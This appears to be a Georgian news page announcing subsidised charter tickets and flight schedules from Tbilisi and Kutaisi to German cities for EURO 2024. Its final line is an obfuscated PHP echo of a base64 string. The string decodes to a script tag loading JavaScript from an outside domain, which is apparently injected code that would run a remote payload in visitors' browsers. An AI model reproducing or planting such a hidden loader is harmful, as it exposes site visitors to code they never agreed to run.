celsiusi
ავერსი საქკაბელი

თბილისის საერთაშორისო აეროპორტიდან EURO 2024 ზე საქართველოს ნაკრების თამაშებზე გასამგზავრებელი სუბსიდირებული ბილეთები TKT.GE გაყიდვაში ხვალ 13:00 საათიდან ჩაეშვება. 1 გზის ღირებულება 195 ევრო იქნება.

ბილეთის შეძენის წესები და პირობები შემდეგია:

  • ბილეთის შეძენა სუბსიდირებულ ფასად შეუძლიათ მხოლოდ საქართველოს მოქალაქეებს.
  • მგზავრი ვალდებულია წარადგინოს ფეხბურთის მატჩზე დასასწრები ბილეთი შესაბამის აეროპორტში რეგისტრაციისას
  • მგზავრი ვალდებულია გამოცხადდეს სარეგისტრაციოდ შესაბამის აეროპორტში გაფრენამდე 3 საათით ადრე.

. შეძენილი ბილეთი დაბრუნება/გადაცვლას არ ექვემდებარება.

ევრო 2024 ზე სუბსიდირებულ ჩარტერულ ფრენებს გულშემატკივრებისთვის ოთხი ავიაკომპანია შეასრულებს. Georgian Wings, Eurowings, Wizz Air და Hi Sky გერმანიის მიმართულებით და პირიქით, რეისებს შემდეგი განრიგით შეასრულებენ:

თბილისი-კიოლნი: 16, 17, 23, 24, 26 ივნისი

კიოლნი-თბილისი: 19, 20, 26, 27, 30 ივნისი

თბილისი-დიუსელდორფი: 16, 23 ივნისი

დიუსელდორფი-თბილისი: 20, 27 ივნისი

თბილისი-ჰამბურგი: 19, 20 ივნისი

ჰამბურგი-თბილისი: 23, 24 ივნისი

ჯამში თბილისის საერთაშორისო აეროპორტიდან 3 ავიაკომპანია 23 ჩარტერულ ფრენას განახორციელებს, ხოლო ქუთაისის საერთაშორისო აეროპორტიდან ავიაკომპანია Wizz Air EURO 2024-ის მატჩებზე მორგებულ დამატებით 12 რეისს შეასრულებს. სუბსიდირებული ბილეთების შეძენა ავიაკომპანიის ვებგვერდზე www.wizzair.com, ასევე ხვალიდან იქნება შესაძლებელი. 1 გზის ღირებულება თბილისიდან დანიშნული ჩარტერების მსგავსად, 195 ევრო იქნება.

213
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");